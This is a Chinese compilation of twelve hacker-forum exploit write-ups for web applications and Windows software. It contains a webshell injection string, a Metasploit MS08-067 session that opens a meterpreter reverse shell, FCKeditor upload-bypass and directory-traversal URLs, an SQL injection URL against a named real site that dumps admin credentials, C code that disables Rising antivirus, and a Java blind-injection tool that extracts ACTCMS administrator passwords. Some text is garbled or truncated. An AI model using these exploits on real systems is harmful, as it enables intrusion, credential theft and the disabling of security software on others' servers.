COCOON Counter统计程序漏洞总结漏洞预警
“Dafunini”通过精心收集,向本站投稿了12篇COCOON Counter统计程序漏洞总结漏洞预警,下面就是小编整理后的COCOON Counter统计程序漏洞总结漏洞预警,希望大家喜欢。
篇1:COCOON Counter统计程序漏洞总结漏洞预警
一、默认数据库:
counter/_db/db_CC_Counter6.mdb
也可直接打开:www.badguest.cn /Counter/utilities/update.asp
查看源文件,查找
COCOON Counter统计程序漏洞总结漏洞预警
。程序的问题。
二、暴路径漏洞
利用探针www.xxx.com /Counter/utilities/aspSysCheck.asp,查看网站路径。
三、注入
存在用户注入,猜解出用户的帐号和密码,无法拿SHELL只可社工利用。
www.badguest.cn /xxcount/core/default.asp?id=xxcnc
流量统计用户名是xxcnc,保存密码的表名是t_Site,用户名列是UID,密码列是PWD,登录页面(www.badguest.cn/xxcount/supervise/login.asp)
四、后台插马
需要进后台,可插一句拿SHELL,
不过大多说管理员密码都为admin,管理员密码并未保存在数据库中,在_inc/Common.asp中。
具体:进后台在管理信箱那把
cnhacker@263.net“:eval request(chr(35))//
复制过去,,点击保存,看下_inc/common.asp的内容。
WebMasterEmail = ”cnhacker@263.net“:eval request(chr(35))//”
嘿嘿来执行下,嘿嘿!成功了,统计程序中的后台拿将“转义成了”所以这用了evalrequest(chr(35))嘿嘿,//是注释,:在asp中就是换行,前提就是你能进到后台,(好多后台管理密码都是admin嘿嘿)php也可以这样的嘿嘿,而且比asp利用的地方更多!需要动下配置语句的前后搭配好,利用好一些符号。
另注:黑防也有人提到了类似方法,可以写成9xiao“%><%eval request(chr(35))%><%',这个方法也比较巧妙,//和'在asp都是注释语句!
by 逍遥复仇
提供修方案:
注意修改默认路径和默认密码。加强过滤和验证。
篇2:MS08067漏洞漏洞预警
这个漏洞已经暴露了很久了,这里我就不说原理了我也不会,所以直接用metasploit操作一下,大牛请绕过
root@bt:~# genlist -s 10.10.10.*
10.10.10.1
10.10.10.2
10.10.10.128
10.10.10.130
10.10.10.254
root@bt:~# nmap -sS -Pn 10.10.10.128
Starting Nmap 6.01 ( nmap.org ) at -04-23 01:49 EDT
Nmap scan report for attacker.dvssc.com (10.10.10.128)
Host is up (0.0000060s latency).
All 1000 scanned ports on attacker.dvssc.com (10.10.10.128) are closed
Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds
root@bt:~# nmap -sS -Pn 10.10.10.130
Starting Nmap 6.01 ( nmap.org ) at 2014-04-23 01:50 EDT
Nmap scan report for service.dvssc.com (10.10.10.130)
Host is up (0.011s latency).
Not shown: 985 closed ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
777/tcp open multiling-http
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1030/tcp open iad1
1521/tcp open oracle
6002/tcp open X11:2
7001/tcp open afs3-callback
7002/tcp open afs3-prserver
8099/tcp open unknown
MAC Address: 00:0C:29:D3:08:A0 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds
root@bt:~#
root@bt:~# nmap --script=smb-check-vulns 10.10.10.130
Starting Nmap 6.01 ( nmap.org ) at 2014-04-23 01:50 EDT
Nmap scan report for service.dvssc.com (10.10.10.130)
Host is up (0.00032s latency).
Not shown: 985 closed ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
777/tcp open multiling-http
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1030/tcp open iad1
1521/tcp open oracle
6002/tcp open X11:2
7001/tcp open afs3-callback
7002/tcp open afs3-prserver
8099/tcp open unknown
MAC Address: 00:0C:29:D3:08:A0 (VMware)
Host script. results:
| smb-check-vulns:
| MS08-067: VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE--3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap done: 1 IP address (1 host up) scanned in 0.56 seconds
root@bt:~# msfconsole
Call trans opt: received. 2-19-98 13:24:18 REC:Loc
Trace program: running
wake up, Neo...
the matrix has you
follow the white rabbit.
knock, knock, Neo.
(`. ,-,
` `. ,;' /
`. ,'/ .'
`. X /.'
.-;--''--.._` ` (
.' / `
, ` ' Q '
, , `._
,.| ' `-.;_'
: . ` ; ` ` --,.._;
' ` , ) .'
`._ , ' /_
; ,''-,;' ``-
``-..__``--`
=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nopsmsf > search ms08_067
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms08_067_netapi -10-28 00:00:00 UTC great Microsoft Server Service Relative Path Stack Corruption
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > set RHOST 10.10.10.130
RHOST => 10.10.10.130
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 10.10.10.130 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > set LHOST 10.10.10.128
LHOST => 10.10.10.128
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 10.10.10.128:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows - No Service Pack - lang:Unknown
[*] Selected Target: Windows 2003 SP0 Universal
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 10.10.10.130
[*] Meterpreter session 1 opened (10.10.10.128:4444 -> 10.10.10.130:3722) at 2014-04-23 01:53:59 -0400
篇3: XSIO漏洞漏洞预警
文章作者:aullik5
原始出处:hi.baidu.com/aullik5/blog ... a02c6785352416.html
今天要讲的这个漏洞是一个非常猥琐的漏洞,
XSIO漏洞漏洞预警
。
大部分网站都有这个漏洞,不光是百度。
什么是XSIO,为什么说它猥琐呢?
XSIO是因为没有限制图片的position属性为absolute,导致可以控制一张图片出现在网页的任意位置。
那么我们就可以用这张图片去覆盖网页上的任意一个位置,包括网站的banner,包括一个link、一个button。
这就可以导致页面破坏。而给图片设置一个链接后,很显然就可以起到一个钓鱼的作用。
XSIO漏洞:
由于对正常的HTML 标签 是没有做过滤的,所以我们可以用这些标签来实施XSIO攻击,
在百度,发blog是在一个table里,所以我们要先把table闭合掉,然后再插入合适的图片。
如以下代码:
复制内容到剪贴板
代码:
百度.jpg(40.08 KB)
2008-10-21 20:50
如图:匿名用户的头像被我覆盖到了banner处.
在实施具体攻击时,可以用图片覆盖link或者banner,当别人点击原本是link或button时,将跳到我们的恶意网站去。
所以说,这是一个非常猥琐的漏洞!
欲知后事如何,且听下回分解!
PS: 本次活动仅仅是个人行为,与任何组织或集体无关.
从明天开始,将进入我们的XSS之旅。
篇4:DeepSoft.com.sys.Servlet上传漏洞漏洞预警
作者:hackdn
注明
JSP+MSSQL的系统,国外应用广,出在注册上传上,过滤不严,修改下面POST,上传JSP
要上载的照片:
DeepSoft.com.sys.Servlet上传漏洞漏洞预警
,
文件大小没有限制,只是“*.ai,*.psd”文件可能上传后无法显示而已。”>
篇5: 游戏网站程序0DAY漏洞预警
作者:amxking
挖掘:百事可乐
准确点应该算是backdoor
inurl:Find.asp 您的位置 >> 客服中心 >> 找回密码
直接传马:
www.XXX.com/user/situjiaduotu2.asp
一句话backdoor ,密码 : value
www.XXX.com/htmledit/Include/upfile_class.asp
www.XXX.com/htmleditIncludeDeCode.asp
读库提权:
D:webwww.xxx.comIncConfig.asp
篇6:FCKeditor漏洞利用总结漏洞预警
Fckeditor漏洞利用总结
查看编辑器版本
FCKeditor/_whatsnew.html
—————————————————————————————————————————————————————————————
2. Version 2.2 版本
Apache+linux 环境下在上传文件后面加个.突破!测试通过,
—————————————————————————————————————————————————————————————
3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。
action=“www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media” method=“post”>Upload a new file:
—————————————————————————————————————————————————————————————
4.FCKeditor 文件上传“.”变“_”下划线的绕过方法
很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。
4.1:提交shell.php+空格绕过
不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。
4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
—————————————————————————————————————————————————————————————
5. 突破建立文件夹
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
—————————————————————————————————————————————————————————————
6. FCKeditor 中test 文件的上传地址
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html
—————————————————————————————————————————————————————————————
7.常用上传地址
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)
JSP 版:
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文
件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址,
—————————————————————————————————————————————————————————————
8.其他上传地址
FCKeditor/_samples/default.html
FCKeditor/_samples/asp/sample01.asp
FCKeditor/_samples/asp/sample02.asp
FCKeditor/_samples/asp/sample03.asp
FCKeditor/_samples/asp/sample04.asp
一般很多站点都已删除_samples 目录,可以试试。
FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。
—————————————————————————————————————————————————————————————
9.列目录漏洞也可助找上传地址
Version 2.4.1 测试通过
修改CurrentFolder 参数使用 ../../来进入不同的目录
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp
根据返回的XML 信息可以查看网站所有的目录。
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
也可以直接浏览盘符:
JSP 版本:
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
—————————————————————————————————————————————————————————————
10.爆路径漏洞
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
—————————————————————————————————————————————————————————————
11. FCKeditor 被动限制策略所导致的过滤不严问题
影响版本: FCKeditor x.x <= FCKeditor v2.4.3
脆弱描述:
FCKeditor v2.4.3 中File 类别默认拒绝上传类型:
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!
而在apache 下,因为“Apache 文件名解析缺陷漏洞”也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。
在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!
篇7:国外一Blog程序0day漏洞预警
作者:YJPS 请注明
近来无聊 去国外网站上转悠,看到一个不错的Blog系统,可以注册用户,并分配一个二级目录,
更无聊的就去检测了下,下面是分析结果。
站点:www.jj.ru/
漏洞地址:www.jj.ru/include/send_email.php?comment=1074
得到用户和密码
www.jj.ru/include/send_email.php?comment=1074+and+1=2+union+select+1,2,3,4,5,concat_ws(0x3a,id,username,password,email),7,8,9+from+blogs_database.websiteadmin_admin_users+limit+1,1--
如想扩大战果,可GOOGLE里:inurl:send_email.php?comment=
漏洞危害不小,请勿借此破坏,
篇8:一个CGI程序的漏洞挖掘漏洞预警
来源:phpeval's BLOG
作者:phpeval
昨天一个朋友扔我了一个cgi程序,叫我想办法拿一个SHELL。
CGI的程序我可是从来没看过。遇到这种对于我来说全新的东西。真的是有点没办法。不过扔来了。就当学习。我硬着头皮看。下面把我学习CGI程序的代码。以及漏洞发现的过程。进行记录一下:
打开该CGI程序。发现根目录下只有两个文件。admin.cgi和另外一个CGI。
CGI的第一行:
#!/usr/bin/perl
猜想该代码应该是用perl解析的。不过可怜的是,我用PHP,asp,js,vbs等脚本。就是没用过perl。继续硬着头皮上。装上perl。 改解析类型。因为perl装上后。解析了pl等后缀。硬是没有解析我的cgi。根据pl解析的方式。加上了cgi的解析。发现解析竟然成功了。而且代码也 正常运行。第一步很顺利。:)
开始学习并分析代码了,我打开admin.cgi:
use lib './pl';use lib './config';require'config.pl';&GetFormData(',');…………$Work=$FORM{Work};$Work='Certify' unless(defined $Work);&$Work;………………
看来perl的语法和php和asp等现在流行的语法都不一样。
第一行和后面的use lib './pl';use lib './config'; 我理解成指定了包含库在什么位置。以便在第三句到第五句的时候require。果然这些pl文件是在这两个文件甲里面的。我测试把pl文件换一个位置。 use lib './xxx';这样来执行代码。果然能正常运行。代表我的猜测是正确的。
&GetFormData(','); 这句我着实理解了很久。最后得出结论。一个字符串前面加上了&符号。就是呼叫函数或者过程的意思。就像vbs的call的意思。php呼叫函数。 当然就不需要CALL什么的了。GetFormData这个函数是他们自己写的。作用是把传进去的参数赋值给$FORM。这样如果我们在浏览器上提交 Work=phpeval.cn 那么$FORM{Work}的值就是phpeval.cn了。
unless(defined $Work); 这句我的理解是if not的意思。就是如果否定的意思。。如果没有设置$Work那么$Work就等于Certify。
再下一句就是&$Work; 呼叫$Work 。这样的话。$Work可以自定义。 但是2的就是$Work好象不能带参数。不知道我说的对不对。所以我有很多函数。比如FileWrite函数我都直接利用不了。在他下面定义了一大批的 sub。看来就是让他们来调用的。我当然不能跟他们的思路走。我找找找。。
config.pl:
sub RegistAct {FileRead(“$DataDir/count.dat”,*CountLines);map{ Error(1006) if((split//)[0] eq $FORM{DataTitle}) } @CountLines;$RegistLine = “$FORM{DataTitle}$FORM{PageTitle}$FORM{RelatedUrl}$FORM{JumpUrl}000newnewnewn”;FileWrite(“$DataDir/count.dat”,*RegistLine,1,1);&Unlock('DATA');Regist;}
相信这句已经不难懂了,
。FileWrite(“$DataDir/count.dat”,*RegistLine,1,1); 向“$DataDir/count.dat”写入数据$FORM{DataTitle}是自己定义的。我加上我的构造的cgi的代码。就写到 count.dat里面了。我提交语句
www.phpeval.cn/admin.cgi?Work=RegistAct&DataTitle=mycode
这样mycode 就被写入了count.dat文件。dat当然是不能被执行的。
不过幸好还有下面的函数。他的作用如果没有想错的话。应该是用来还原数据用的。不过没有验证。让我有机会了。
sub RecoveryAct {RefererCheck() if($MyUrl);MethodCheck () if($MethodChkMode);&Lock('DATA');FileRead(“$FORM{TargetFile}”,*BackupLines);FileWrite(“$FORM{DataDir}/count.dat”,*BackupLines);&Unlock('DATA');Recovery();}
我提交如下的连接:
www.phpeval.cn/admin.cgi?Work=RecoveryAct&TargetFile=DataDir/count.dat&DataDir=1.cgi%00
万幸的是%00终究还是截断了。呵呵。这样我的SHELL就出来了。
笔记:其实这个构造的过程是虚假的。因为cgi我刚刚接触。用来写马是需要很长时间的。但是幸运的是他们的服务器上还支持php.我直接备份出来的 是php的文件。所以构造这个东西我还是用的mycode来代替本来该写的cgi马。其实要写一个cgi马也不会困难到哪去。因为这个代码里面把目录遍 历,读文件。写文件的函数都构造好了。想改一个WEBSHELL也是不太难的。
本来是想写一个文章来介绍一下未知脚本漏洞的挖掘。但是没没有介绍到什么。本来写着写着想就写写cgi漏洞的挖掘。但是介绍得又太简单。最后干脆说公布一下这种程序的漏洞。但是这个程序少之又少。甚至我连CGI的马马都没做出来。人懒了。
篇9:天下马ASP收信程序漏洞漏洞预警
最近看了八进制论坛上针对伯乐ASP收信程序的漏洞分析,通过提交数据达到获取webshell的方法!正好有朋友让我帮忙看一看天下马的提交问题!主要是由于有些程序使用者自定义了一些函数,使得原来的方法不能够绕过函数,但是昨天看了看,还是可以通过其他方法实现的!
首先,天下马的其他bug我们这里就不看了,直接看提交过程!
网上公布的提交过程是类似这种的连接:
www.xxx.com/post.asp?act=&d00=202&d01=
src=www.a.com>&d02=&d10=&d11=17000813&d20=&d21=&d22=&d23=&d30=天下马
&d31=&d32=1&d33=&d40=0&d41=0&d42=0&d50=&d51=&d98=&d99=123
返回如图1所示表示正常插入
我们来看看察看数据的页面及其部分源代码,如图2所示
但是有些程序却使用了一些自定义函数,针对提交的数据进行验证和过滤
我这里有一份代码如下:
[Copy to clipboard] [ - ]CODE:
相信很多朋友都已经看出来了,正如分析网站系统一样,这个自定义的代码只是针对Request.QueryString和Request.Form进行了过滤,没有对cookie提交的方式进行过滤!那么我们再看看天下马的获取方式
strAreaName = request(“d00”) //还有很多,只写出一个
....
....
if strAreaName “” then RS(“AreaName”) = strAreaName //还有很多,只写出一个
....
....
这个是没有经过过滤的天下马的代码,增加自定义函数的页面是将request变量经过了Function CheckStr(ChkStr)的过滤,但是还有一种提交方式就是cookie提交!下面我们看看提交方法!
首先是针对正常提交时候进行抓包分析,然后进行数据包的构造,我这里构造的包如下(这里我将真实信息修改了,^_^):
[Copy to clipboard] [ - ]CODE:
GET /post.asp?
act=&d00=202&d02=&d11=17000813&d20=&d21=&d22=&d23=&d30=cookie&d31=&d32=1&d33=&d40=0&d41=0&d4
2=0&d50=&d51=&d98=&d99=123 HTTP/1.1
Accept: */*
Accept-Language: zh-cn
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)
Host: xxx.com
Connection: Keep-Alive
Cookie: ASPSESSIONIDCATSSDRC=NAAGENEADMNBDLJJFMKLGMDO;d01=;d10=
这里的数据我们只需要把通过cookie提交的数据放入cookie项中就可以了,其他可以保持不变!
然后使用NC提交!
我们来看看察看数据的页面及其部分源代码,如图3所示
成功写入!
至于利用方法我想就不需要再多写了,朋友们自己去挖掘吧!
篇10:瑞星0day漏洞漏洞预警
编写成程序后双击运行直接K掉瑞星(重起也没用)
以下是漏洞利用代码
------------------------------------------------------------------------------
DWORD GetProcessIdFromName(LPCTSTR name)
{
PROCESSENTRY32 pe;
DWORD id = 0;
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
pe.dwSize = sizeof(PROCESSENTRY32);
if( !Process32First(hSnapshot,&pe) )
return 0;
do
{
pe.dwSize = sizeof(PROCESSENTRY32);
if( Process32Next(hSnapshot,&pe)==FALSE )
break;
if(strcmp(pe.szExeFile,name) == 0)
{
id = pe.th32ProcessID;
break;
}
} while(1);
CloseHandle(hSnapshot);
return id;
}
DWORD GetProcessID(char *FileName)
{
HANDLE myhProcess;
PROCESSENTRY32 mype;
BOOL mybRet;
//进行进程快照
myhProcess=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); //TH32CS_SNAPPROCESS快照所有进程
//开始进程查找
mybRet=Process32First(myhProcess,&mype);
//循环比较,得出ProcessID
while(mybRet)
{
if(strcmp(FileName,mype.szExeFile)==0)
return mype.th32ProcessID;
else
mybRet=Process32Next(myhProcess,&mype);
}
return 0;
}
void killProcess(CString www ,LPCTSTR name,char *xyz)
{
DWORD nPid = 0;
HANDLE hProcess;
DWORD nExitCode = 0;
DWORD nAddress = 0x1000;
nPid=GetProcessIdFromName(name);
hProcess = OpenProcess (PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION, 0,nPid);
WriteProcessMemory(hProcess,(LPVOID)0x0047EB17,&nPid,1,NULL);
while ( nAddress <= 0x7FFFF000 )
{
GetExitCodeProcess(hProcess, &nExitCode);
if (nExitCode != STILL_ACTIVE)
{
break;
}
WriteProcessMemory(hProcess,(LPVOID)0x0047EB17,&nPid,1,NULL);
VirtualFreeEx(hProcess, (LPVOID)nAddress, 0, 0x8000);
nAddress += 0x1000;
}
篇11:kingcms5.0/5.1漏洞漏洞预警
1,kingcms 5.0 fckeditor的默认路径在 admin/system/editor/FCKeditor/editor/fckeditor.Html
把本地的马命名为 hx.asp;jpg 注意看 jpg前面没有点了..
OK了..其实以后做站结合fckeditor这类的编辑器..最好加个验证..只有管理才能访问..这样或者比较好吧
2。编辑器路径:/admin/system/editor/
利用方式:访问www.xxx.com/admin/system/editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=qing.asp后在/up_files/image/目录下创建一个明文qing.asp的文件夹,
然后访问www.xxx.com/admin/system/editor/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp,选择刚创建的qing.asp文件夹并上传图片木马,可以上传包含一句话内容的图片,然后使用一句话客户端连接。
3。该系统后台也是比较脆弱的,若能成功登陆后台拿webshell比较简单,后台中有个webftp的功能,可以上传任意文件。默认数据库地址为/db/King#Content#Management#System.mdb,下载的时候将#替换成%23后下载。
有很多存在FCKEDITOR编辑器的基本存在该漏洞 与其说是KINGCMS的漏洞不如说是FCKEDITOR的漏洞
篇12:ACTCMS注入漏洞漏洞预警
一款ASP的CMS程序,用的人并不是太多。
GOOGLE一下关键字“Copyright @ 2006 www.actcms.com” ,不是太多。
今天看了一下代码。
基本上所有的参数全都被过滤掉了。。
不过投票那里出了点小问题。。
在/plus/vote/vote.asp页面。
代码如下:
ASP/Visual Basic代码
....
if request(“voted”).count=0 then
response.write “”
response.end
end if
for i=1 to request(“voted”).count
actcms.actexe(“Update vote_act set VoteNum=VoteNum+1 where id=”&request(“voted”)(i))
next
....
response.Redirect “index.asp?id=”&id&“”
id直接从request里面取的,不过因为前面是update ,再加上后面的response.redirect,利用起来比较麻烦。而且这是一个一般工具无法识别的注入点。因为无论我们构造什么语句在后面,它都会跳到index.asp页面。
唯一有变化的就是当我们构造的注入条件正确的时候,票数会增加。 手工利用起来相当的麻烦,试了现在的那些注入工具明小子,pangolin之类的也不能注入,所以我自己动手写了一个简单的程序 ,因为只会JAVA,所以就用JAVA写了。。写的比较粗糙。用的穷举法,这样写着比较方便。速度慢就慢吧。
代码如下:
Java代码
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.net.URL;
import java.net.URLConnection;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
public class ActCmsGetPwd {
public static char[] arr = { '0', '1', '2', '3', '4', '5', '6', '7', '8',
'9', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l',
'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y',
'z' };
public static String siteurl = “”;
public static int voteid = 1;
public static String charset = “”;
public static void main(String[] args) throws Exception {
if (args.length < 4) {
System.out
.println(“usage:java ActCmsGetPwd System.out.println(“siteurl:目标站点”); System.out.println(“voteid:投票id”); System.out .println(“totalVoteNum:当前的投票人数,请自行查看plus/vote/index.asp?id= System.out.println(“charset:目标站点所用的ACTCMS的字符集,请自行查看网页源代码”); System.out.println(“eg:java ActCmsGetPwd www.abc.com/ 1 15 gb2312”); return; } siteurl = args[0]; voteid = Integer.parseInt(args[1]); int preVoteNum = Integer.parseInt(args[2]); charset = args[3]; System.out.println(“Code by Ninty , QQ 3191864”); System.out.print(“password is :”); for (int i = 1; i <= 16; i++) { System.out.print(send(i, 0, preVoteNum)); preVoteNum++; } System.out.println(“nDone!”); } public static char send(int a, int b, int preVoteNum) throws Exception { String sql = “%20and%20(select%20top%201%20mid(password,” + a + “,1)%20from%20admin_act%20where%20supertf%20=1)%20=%20'” + arr[b] + “'”; URL u = new URL(siteurl + “/Plus/vote/vote.asp?dopost=send&id=”+voteid+“&ismore=0&voted=3” + sql); URLConnection conn = u.openConnection(); BufferedReader reader = new BufferedReader(new InputStreamReader(conn .getInputStream(),charset)); String str = reader.readLine(); while (str != null) { if (str.indexOf(“ 投票人数:”) != -1) { break; } str = reader.readLine(); } reader.close(); if (!isRight(str, preVoteNum)) { return send(a, ++b, preVoteNum); } else { return arr[b]; } } public static boolean isRight(String str, int preVoteNum) { if (str == null) { System.out.println(“无法读取!”); System.exit(0); } Pattern pat = Pattern.compile(“人数:(d+)”); Matcher mat = pat.matcher(str); if (mat.find()) { int num = Integer.parseInt(mat.group(1)); if (num != preVoteNum) { return true; } } return false; } }
下面是已经编译好的 class文件,编译环境JDK6,
直接运行就好。
actcmsgetpwd.class
在网上找了几个站测试了一下,都可以得到超级管理员的密码,不过官网好像不存在这个漏洞。
【COCOON Counter统计程序漏洞总结漏洞预警】相关文章:
文档为doc格式
